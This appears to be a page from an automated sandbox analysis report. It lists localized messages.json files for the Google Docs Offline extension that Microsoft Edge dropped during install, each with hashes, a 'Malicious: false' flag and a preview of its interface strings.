SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\vi\messages.json

Download File

